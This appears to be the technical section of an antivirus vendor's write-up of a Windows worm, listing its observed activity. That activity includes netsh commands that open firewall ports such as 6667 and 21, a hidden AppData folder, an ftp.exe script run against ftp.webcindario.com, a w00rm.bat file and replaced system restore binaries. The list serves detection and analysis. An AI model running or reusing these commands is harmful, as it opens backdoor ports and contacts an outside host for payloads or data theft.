Техническая информация
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 6667 tvo
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65000 txb
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 59302 tvt
- '<SYSTEM32>\attrib.exe' +h %APPDATA%\elf
- '<SYSTEM32>\ping.exe' -n 60 0.0.0.0
- '<SYSTEM32>\ping.exe' -n 5 0.0.0.0
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\dat.txt ftp.webcindario.com
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 45008 tnt
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 21 tst
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 20 tdt
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\w00rm.bat" "
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 80 tqt
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 29003 tct
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 18318 tcn
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 35001 tcy
- %WINDIR%\dat.txt
- %TEMP%\prnetcfg.vbs
- %TEMP%\1.tmp\w00rm.bat
- %WINDIR%\dat.txt
- <SYSTEM32>\Restore\rstrui.exe
- <SYSTEM32>\dllcache\rstrui.exe
- 'localhost':1051
- 'localhost':1049
- 'ft#.##bcindario.com':21
- DNS ASK ft#.##bcindario.com